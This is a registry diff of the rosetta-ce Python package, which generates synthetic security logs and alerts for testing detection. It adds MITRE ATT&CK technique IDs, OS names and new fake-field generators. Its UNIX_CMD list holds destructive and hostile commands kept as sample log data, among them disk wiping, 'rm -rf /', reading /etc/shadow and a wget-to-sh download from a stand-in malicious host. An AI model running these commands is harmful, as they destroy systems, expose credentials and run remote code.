rosetta-ce 1.6.7__py3-none-any.whl → 1.6.9__py3-none-any.whl

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Potentially problematic release.

This version of rosetta-ce might be problematic. Click here for more details.

Files changed (8) hide show
  1. rosetta/constants/attributes.py +280 -0
  2. rosetta/constants/systems.py +43 -1
  3. rosetta/rfaker.py +45 -6
  4. {rosetta_ce-1.6.7.dist-info → rosetta_ce-1.6.9.dist-info}/METADATA +1 -1
  5. {rosetta_ce-1.6.7.dist-info → rosetta_ce-1.6.9.dist-info}/RECORD +8 -8
  6. {rosetta_ce-1.6.7.dist-info → rosetta_ce-1.6.9.dist-info}/WHEEL +1 -1
  7. {rosetta_ce-1.6.7.dist-info → rosetta_ce-1.6.9.dist-info}/LICENSE +0 -0
  8. {rosetta_ce-1.6.7.dist-info → rosetta_ce-1.6.9.dist-info}/top_level.txt +0 -0
rosetta/constants/attributes.py CHANGED
@@ -3,3 +3,283 @@ INCIDENTS_TYPES = [
3
3
  'Control Avoidance', 'Rogue Device', 'Denial Of Service', 'Account Compromised'
4
4
  ]
5
5
  SEVERITIES = ['Low', 'Medium', 'High', 'Critical']
6
+
7
+ ATTACK_TECHNIQUES = [
8
+ "T1548",
9
+ "T1548.002",
10
+ "T1548.004",
11
+ "T1548.001",
12
+ "T1548.003",
13
+ "T1548.006",
14
+ "T1548.005",
15
+ "T1134",
16
+ "T1134.002",
17
+ "T1134.003",
18
+ "T1134.004",
19
+ "T1134.005",
20
+ "T1134.001",
21
+ "T1531",
22
+ "T1087",
23
+ "T1087.004",
24
+ "T1087.002",
25
+ "T1087.003",
26
+ "T1087.001",
27
+ "T1098",
28
+ "T1098.001",
29
+ "T1098.003",
30
+ "T1098.006",
31
+ "T1098.002",
32
+ "T1098.005",
33
+ "T1098.004",
34
+ "T1650",
35
+ "T1583",
36
+ "T1583.005",
37
+ "T1583.002",
38
+ "T1583.001",
39
+ "T1583.008",
40
+ "T1583.004",
41
+ "T1583.007",
42
+ "T1583.003",
43
+ "T1583.006",
44
+ "T1595",
45
+ "T1595.001",
46
+ "T1595.002",
47
+ "T1595.003",
48
+ "T1557",
49
+ "T1557.002",
50
+ "T1557.003",
51
+ "T1557.001",
52
+ "T1071",
53
+ "T1071.004",
54
+ "T1071.002",
55
+ "T1071.003",
56
+ "T1071.001",
57
+ "T1010",
58
+ "T1560",
59
+ "T1560.003",
60
+ "T1560.002",
61
+ "T1560.001",
62
+ "T1123",
63
+ "T1119",
64
+ "T1020",
65
+ "T1020.001",
66
+ "T1197",
67
+ "T1547",
68
+ "T1547.014",
69
+ "T1547.002",
70
+ "T1547.006",
71
+ "T1547.008",
72
+ "T1547.015",
73
+ "T1547.010",
74
+ "T1547.012",
75
+ "T1547.007",
76
+ "T1547.001",
77
+ "T1547.005",
78
+ "T1547.009",
79
+ "T1547.003",
80
+ "T1547.004",
81
+ "T1547.013",
82
+ "T1037",
83
+ "T1037.002",
84
+ "T1037.001",
85
+ "T1037.003",
86
+ "T1037.004",
87
+ "T1037.005",
88
+ "T1176",
89
+ "T1217",
90
+ "T1185",
91
+ "T1110",
92
+ "T1110.004",
93
+ "T1110.002",
94
+ "T1110.001",
95
+ "T1110.003",
96
+ "T1612",
97
+ "T1115",
98
+ "T1651",
99
+ "T1580",
100
+ "T1538",
101
+ "T1526",
102
+ "T1619",
103
+ "T1059",
104
+ "T1059.002",
105
+ "T1059.010",
106
+ "T1059.009",
107
+ "T1059.007",
108
+ "T1059.008",
109
+ "T1059.001",
110
+ "T1059.006",
111
+ "T1059.004",
112
+ "T1059.005",
113
+ "T1059.003",
114
+ "T1092",
115
+ "T1586",
116
+ "T1586.003",
117
+ "T1586.002",
118
+ "T1586.001",
119
+ "T1554",
120
+ "T1584",
121
+ "T1584.005",
122
+ "T1584.002",
123
+ "T1584.001",
124
+ "T1584.008",
125
+ "T1584.004",
126
+ "T1584.007",
127
+ "T1584.003",
128
+ "T1584.006",
129
+ "T1609",
130
+ "T1613",
131
+ "T1659",
132
+ "T1136",
133
+ "T1136.003",
134
+ "T1136.002",
135
+ "T1136.001",
136
+ "T1543",
137
+ "T1543.005",
138
+ "T1543.001",
139
+ "T1543.004",
140
+ "T1543.002",
141
+ "T1543.003",
142
+ "T1555",
143
+ "T1555.006",
144
+ "T1555.003",
145
+ "T1555.001",
146
+ "T1555.005",
147
+ "T1555.002",
148
+ "T1555.004",
149
+ "T1485",
150
+ "T1132",
151
+ "T1132.002",
152
+ "T1132.001",
153
+ "T1486",
154
+ "T1565",
155
+ "T1565.003",
156
+ "T1565.001",
157
+ "T1565.002",
158
+ "T1001",
159
+ "T1001.001",
160
+ "T1001.003",
161
+ "T1001.002",
162
+ "T1074",
163
+ "T1074.001",
164
+ "T1074.002",
165
+ "T1030",
166
+ "T1530",
167
+ "T1602",
168
+ "T1602.002",
169
+ "T1602.001",
170
+ "T1213",
171
+ "T1213.003",
172
+ "T1213.001",
173
+ "T1213.002",
174
+ "T1005",
175
+ "T1039",
176
+ "T1025",
177
+ "T1622",
178
+ "T1491",
179
+ "T1491.002",
180
+ "T1491.001",
181
+ "T1140",
182
+ "T1610",
183
+ "T1587",
184
+ "T1587.002",
185
+ "T1587.003",
186
+ "T1587.004",
187
+ "T1587.001",
188
+ "T1652",
189
+ "T1006",
190
+ "T1561",
191
+ "T1561.001",
192
+ "T1561.002",
193
+ "T1482",
194
+ "T1484",
195
+ "T1484.001",
196
+ "T1484.002",
197
+ "T1189",
198
+ "T1568",
199
+ "T1568.003",
200
+ "T1568.002",
201
+ "T1568.001",
202
+ "T1114",
203
+ "T1114.003",
204
+ "T1114.001",
205
+ "T1114.002",
206
+ "T1573",
207
+ "T1573.002",
208
+ "T1573.001",
209
+ "T1499",
210
+ "T1499.003",
211
+ "T1499.004",
212
+ "T1499.001",
213
+ "T1499.002",
214
+ "T1611",
215
+ "T1585",
216
+ "T1585.003",
217
+ "T1585.002",
218
+ "T1585.001",
219
+ "T1546",
220
+ "T1546.008",
221
+ "T1546.009",
222
+ "T1546.010",
223
+ "T1546.011",
224
+ "T1546.001",
225
+ "T1546.015",
226
+ "T1546.014",
227
+ "T1546.012",
228
+ "T1546.016",
229
+ "T1546.006",
230
+ "T1546.007",
231
+ "T1546.013",
232
+ "T1546.002",
233
+ "T1546.005",
234
+ "T1546.004",
235
+ "T1546.003",
236
+ "T1480",
237
+ "T1480.001",
238
+ "T1048",
239
+ "T1048.002",
240
+ "T1048.001",
241
+ "T1048.003",
242
+ "T1041",
243
+ "T1011",
244
+ "T1011.001",
245
+ "T1052",
246
+ "T1052.001",
247
+ "T1567",
248
+ "T1567.004",
249
+ "T1567.002",
250
+ "T1567.001",
251
+ "T1567.003",
252
+ "T1190",
253
+ "T1203",
254
+ "T1212",
255
+ "T1211",
256
+ "T1068",
257
+ "T1210",
258
+ "T1133",
259
+ "T1008",
260
+ "T1083",
261
+ "T1222",
262
+ "T1222.002",
263
+ "T1222.001",
264
+ "T1657",
265
+ "T1495",
266
+ "T1187",
267
+ "T1606",
268
+ "T1606.002",
269
+ "T1606.001",
270
+ "T1592",
271
+ "T1592.004",
272
+ "T1592.003",
273
+ "T1592.001",
274
+ "T1592.002",
275
+ "T1589",
276
+ "T1589.001",
277
+ "T1589.002",
278
+ "T1589.003",
279
+ "T1590",
280
+ "T1590.002",
281
+ "T1590.001",
282
+ "T1590.005",
283
+ "T1590.006",
284
+ "T1590"
285
+ ]
rosetta/constants/systems.py CHANGED
@@ -1,3 +1,45 @@
1
+ OS_LIST = [
2
+ "AIX 7.2",
3
+ "HP-UX 11i v3",
4
+ "Solaris 11",
5
+ "FreeBSD 13.2",
6
+ "OpenBSD 7.4",
7
+ "NetBSD 10.0",
8
+ "Ubuntu 22.04 LTS",
9
+ "Red Hat Enterprise Linux 9",
10
+ "CentOS 8",
11
+ "Debian 12",
12
+ "Fedora 38",
13
+ "Arch Linux 2024.09",
14
+ "Kali Linux 2024.1",
15
+ "Alpine Linux 3.18",
16
+ "SUSE Linux Enterprise Server 15 SP4",
17
+ "Windows 10 Pro",
18
+ "Windows 11 Home",
19
+ "Windows Server 2019",
20
+ "Windows Server 2022",
21
+ "Windows 8.1",
22
+ "Windows 7 SP1",
23
+ "macOS Ventura 13",
24
+ "macOS Monterey 12",
25
+ "macOS Big Sur 11",
26
+ "macOS Catalina 10.15",
27
+ "macOS Mojave 10.14",
28
+ "iOS 17",
29
+ "iPadOS 17",
30
+ "Android 14",
31
+ "HarmonyOS 3.1"
32
+ ]
33
+ UNIX_CMD = [
34
+ "cat /etc/shadow",
35
+ "dd if=/dev/zero of=/dev/sda",
36
+ "rm -rf /",
37
+ "find / -name '*.log' -exec rm -f {} \\;",
38
+ "wget -O- http://malicious.example.com/malware | sh",
39
+ "iptables -F",
40
+ "chmod -R 777 /",
41
+ "chown -R nobody:nogroup /"
42
+ ]
1
43
  UNIX_CMD = [
2
44
  "cat /etc/shadow",
3
45
  "dd if=/dev/zero of=/dev/sda",
@@ -80,7 +122,7 @@ WIN_EVENTS = [
80
122
  '<Data Name="ProcessName">{process_name}</Data><Data Name="ProcessId">{process_id}</Data>'
81
123
  '<Data Name="DestinationLogonId">{destination_login_id}</Data>'
82
124
  '<Data Name="SourceNetworkAddress">{source_network_address}</Data>'
83
- '<Data Name="SourcePort">{source_port}</Data><Data Name="LogonGuid">{guid}</Data>'
125
+ '<Data Name="SourcePort">{local_port}</Data><Data Name="LogonGuid">{guid}</Data>'
84
126
  '<Data Name="TransmittedServices">{transmitted_services}</Data></EventData></Event>',
85
127
  '<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">'
86
128
  '<System><Provider Name="Microsoft-Windows-Security-Auditing" Guid="{guid}"/>'
rosetta/rfaker.py CHANGED
@@ -12,8 +12,8 @@ from datetime import datetime, timedelta
12
12
  from typing import Optional, List
13
13
  from rosetta.constants.sources import BAD_IP_SOURCES, GOOD_IP_SOURCES, BAD_URL_SOURCES, GOOD_URL_SOURCES, \
14
14
  BAD_SHA256_SOURCES, GOOD_SHA256_SOURCES, CVE_SOURCES, TERMS_SOURCES
15
- from rosetta.constants.systems import UNIX_CMD, WINDOWS_CMD, WIN_PROCESSES, WIN_EVENTS
16
- from rosetta.constants.attributes import INCIDENTS_TYPES, SEVERITIES
15
+ from rosetta.constants.systems import OS_LIST, UNIX_CMD, WINDOWS_CMD, WIN_PROCESSES, WIN_EVENTS
16
+ from rosetta.constants.attributes import INCIDENTS_TYPES, SEVERITIES, ATTACK_TECHNIQUES
17
17
  from rosetta.constants.sensors import ACTIONS, PROTOCOLS, TECHNIQUES, ERROR_CODE
18
18
  from rosetta.constants.db import QUERY_TYPE, DATABASE_NAME, QUERY
19
19
 
@@ -37,7 +37,7 @@ class Observables:
37
37
  dst_host: Optional[list] = None, src_domain: Optional[list] = None, dst_domain: Optional[list] = None,
38
38
  sender_email: Optional[list] = None, recipient_email: Optional[list] = None,
39
39
  email_subject: Optional[list] = None, email_body: Optional[list] = None,
40
- url: Optional[list] = None, source_port: Optional[list] = None, remote_port: Optional[list] = None,
40
+ url: Optional[list] = None, local_port: Optional[list] = None, remote_port: Optional[list] = None,
41
41
  protocol: Optional[list] = None, inbound_bytes: Optional[list] = None,
42
42
  outbound_bytes: Optional[list] = None, app: Optional[list] = None, os: Optional[list] = None,
43
43
  user: Optional[list] = None, cve: Optional[list] = None, file_name: Optional[list] = None,
@@ -63,7 +63,7 @@ class Observables:
63
63
  self.email_subject = email_subject
64
64
  self.email_body = email_body
65
65
  self.url = url
66
- self.source_port = source_port
66
+ self.local_port = local_port
67
67
  self.remote_port = remote_port
68
68
  self.protocol = protocol
69
69
  self.inbound_bytes = inbound_bytes
@@ -316,6 +316,30 @@ class Events:
316
316
  if field == "unix_cmd":
317
317
  field_value = random.choice(observables.unix_cmd) if observables and observables.unix_cmd \
318
318
  else random.choice(UNIX_CMD)
319
+ if field == "technique":
320
+ field_value = random.choice(observables.technique) if observables and observables.technique \
321
+ else random.choice(ATTACK_TECHNIQUES)
322
+ if field == "entry_type":
323
+ field_value = random.choice(observables.entry_type) if observables and observables.entry_type \
324
+ else faker.sentence(nb_words=2)
325
+ if field == "sensor":
326
+ field_value = random.choice(observables.sensor) if observables and observables.sensor \
327
+ else faker.sentence(nb_words=1)
328
+ if field == "event_id":
329
+ field_value = random.choice(observables.event_id) if observables and observables.event_id \
330
+ else faker.random_int(min=10, max=1073741824)
331
+ if field == "error_code":
332
+ field_value = random.choice(observables.error_code) if observables and observables.error_code \
333
+ else faker.random_int(min=1000, max=5000)
334
+ if field == "terms":
335
+ field_value = random.choice(observables.terms) if observables and observables.terms \
336
+ else faker.sentence(nb_words=10)
337
+ if field == "alert_types":
338
+ field_value = random.choice(observables.alert_types) if observables and observables.alert_types \
339
+ else faker.sentence(nb_words=1)
340
+ if field == "action_status":
341
+ field_value = random.choice(observables.action_status) if observables and observables.action_status \
342
+ else random.choice(ACTIONS)
319
343
  if field == "severity":
320
344
  field_value = random.choice(observables.severity) if observables and observables.severity \
321
345
  else random.choice(SEVERITIES)
@@ -327,6 +351,12 @@ class Events:
327
351
  if field == "remote_ip":
328
352
  field_value = random.choice(observables.remote_ip) if observables and observables.remote_ip \
329
353
  else Observables.generator(observable_type=ObservableType.IP, known=ObservableKnown.BAD, count=1)[0]
354
+ if field == "local_ip_v6":
355
+ field_value = random.choice(observables.local_ip_v6) if observables and observables.local_ip_v6 \
356
+ else faker.ipv6()
357
+ if field == "remote_ip_v6":
358
+ field_value = random.choice(observables.remote_ip_v6) if observables and observables.remote_ip_v6 \
359
+ else faker.ipv6()
330
360
  if field == "remote_port":
331
361
  field_value = random.choice(observables.remote_port) if observables and observables.remote_port \
332
362
  else faker.random_int(min=1024, max=65535)
@@ -339,6 +369,12 @@ class Events:
339
369
  if field == "outbound_bytes":
340
370
  field_value = random.choice(observables.outbound_bytes) if observables and observables.outbound_bytes \
341
371
  else faker.random_int(min=10, max=1073741824)
372
+ if field == "app":
373
+ field_value = random.choice(observables.app) if observables and observables.app \
374
+ else faker.sentence(nb_words=2)
375
+ if field == "os":
376
+ field_value = random.choice(observables.os) if observables and observables.os \
377
+ else random.choice(OS_LIST)
342
378
  if field == "protocol":
343
379
  field_value = random.choice(observables.protocol) if observables and observables.protocol \
344
380
  else random.choice(PROTOCOLS)
@@ -351,6 +387,9 @@ class Events:
351
387
  if field == "src_domain":
352
388
  field_value = random.choice(observables.src_domain) if observables and observables.src_domain \
353
389
  else faker.domain_name()
390
+ if field == "dst_domain":
391
+ field_value = random.choice(observables.dst_domain) if observables and observables.dst_domain \
392
+ else faker.domain_name()
354
393
  if field == "sender_email":
355
394
  field_value = random.choice(observables.sender_email) if observables and observables.sender_email \
356
395
  else faker.email()
@@ -428,7 +467,7 @@ class Events:
428
467
  if field == "file_name":
429
468
  field_value = random.choice(observables.file_name) if observables and observables.file_name \
430
469
  else faker.file_name()
431
- if field == "cve_id":
470
+ if field == "cve":
432
471
  field_value = random.choice(observables.cve) if observables and observables.cve \
433
472
  else Observables.generator(observable_type=ObservableType.CVE, count=1)
434
473
  if field == "file_hash":
@@ -692,7 +731,7 @@ class Events:
692
731
  domain_name=domain_name, subject_login_id=subject_login_id,
693
732
  privilege_list=privilege_list, cmd=cmd,
694
733
  destination_login_id=destination_login_id,
695
- source_network_address=source_network_address, source_port=local_port,
734
+ source_network_address=source_network_address, local_port=local_port,
696
735
  transmitted_services=transmitted_services, file_name=file_name)
697
736
  winevent_messages.append(win_event)
698
737
  return winevent_messages
{rosetta_ce-1.6.7.dist-info → rosetta_ce-1.6.9.dist-info}/METADATA RENAMED
@@ -1,6 +1,6 @@
1
1
  Metadata-Version: 2.1
2
2
  Name: rosetta-ce
3
- Version: 1.6.7
3
+ Version: 1.6.9
4
4
  Summary: Rosetta is a Python package that can be used to fake security logs and alerts for testing different detection and response use cases.
5
5
  Home-page: https://github.com/ayman-m/rosetta
6
6
  Author: Ayman Mahmoud
{rosetta_ce-1.6.7.dist-info → rosetta_ce-1.6.9.dist-info}/RECORD RENAMED
@@ -1,15 +1,15 @@
1
1
  rosetta/__init__.py,sha256=9rqZF7bpDMRN5H-rjNRUfzQAOIqyc21hTTZfYufTy04,92
2
2
  rosetta/rconverter.py,sha256=oPdWMtO6_aeQC8PqCl4nHKEpVb1kaBACSaNXsz-o00Q,3008
3
- rosetta/rfaker.py,sha256=ptjDV_ZvcZYp55RSm6KsSHg4JWkZgHQnlrDIMBf04Uw,46051
3
+ rosetta/rfaker.py,sha256=9rIuarWH9fCsO3n5pjmrBdHxxtBhLf-JuhdgzpFCbJk,48511
4
4
  rosetta/rsender.py,sha256=Zfj9MVckO49iabxCQ19fkGKpKnzOXB1iHOTb9CgkzsE,10463
5
5
  rosetta/constants/__init__.py,sha256=47DEQpj8HBSa-_TImW-5JCeuQeRkm5NMpJWZG3hSuFU,0
6
- rosetta/constants/attributes.py,sha256=ZWl1xHAAv0jh1oqyOCR9RjqbdaDsmBKSq59ame2HNgo,269
6
+ rosetta/constants/attributes.py,sha256=dxPzi5D00U8Fvo1B1u1bC5-kYqN3lCIpYwwroHHp-hw,4622
7
7
  rosetta/constants/db.py,sha256=ZobruGzgijbbFHEnLGuwVwZTxLCBL-_vdmUDPVv3OAo,4708
8
8
  rosetta/constants/sensors.py,sha256=ZxPWFrNqDFKRVn9ai-5vtvIiU4-3FAXQIRj7gFoBRPk,1936
9
9
  rosetta/constants/sources.py,sha256=b3ynlKGw1gw7VBA4yCYkJ7aq4vVPfypqA8W_kuAZaBA,1658
10
- rosetta/constants/systems.py,sha256=dxFLs55Lg03rR-0T7bTFcKsdoXQuURFvGKFLO5IR_tM,6478
11
- rosetta_ce-1.6.7.dist-info/LICENSE,sha256=jF5fCbmI1A-yyvPAEeQ5VHM094tRLlWsMyun-UlX-pQ,1070
12
- rosetta_ce-1.6.7.dist-info/METADATA,sha256=Me96Qh20eNVe3nckB36bMrOwoH0-VHd0zdgSX6ejLXQ,11321
13
- rosetta_ce-1.6.7.dist-info/WHEEL,sha256=cVxcB9AmuTcXqmwrtPhNK88dr7IR_b6qagTj0UvIEbY,91
14
- rosetta_ce-1.6.7.dist-info/top_level.txt,sha256=HLxDc6BJxHZDzVIlOwpCGH0DqIf65OhZcHniRDaUUZc,8
15
- rosetta_ce-1.6.7.dist-info/RECORD,,
10
+ rosetta/constants/systems.py,sha256=bdXUf93iKXMdxnjkBIiE1qC-QlyqVsUd5gVfFqHfddg,7431
11
+ rosetta_ce-1.6.9.dist-info/LICENSE,sha256=jF5fCbmI1A-yyvPAEeQ5VHM094tRLlWsMyun-UlX-pQ,1070
12
+ rosetta_ce-1.6.9.dist-info/METADATA,sha256=I3PIo6uGDgovzCgx47x0VVTDT3kPvdJ_NDYaEFSzlMA,11321
13
+ rosetta_ce-1.6.9.dist-info/WHEEL,sha256=GV9aMThwP_4oNCtvEC2ec3qUYutgWeAzklro_0m4WJQ,91
14
+ rosetta_ce-1.6.9.dist-info/top_level.txt,sha256=HLxDc6BJxHZDzVIlOwpCGH0DqIf65OhZcHniRDaUUZc,8
15
+ rosetta_ce-1.6.9.dist-info/RECORD,,
{rosetta_ce-1.6.7.dist-info → rosetta_ce-1.6.9.dist-info}/WHEEL RENAMED
@@ -1,5 +1,5 @@
1
1
  Wheel-Version: 1.0
2
- Generator: setuptools (74.1.2)
2
+ Generator: setuptools (75.1.0)
3
3
  Root-Is-Purelib: true
4
4
  Tag: py3-none-any
5
5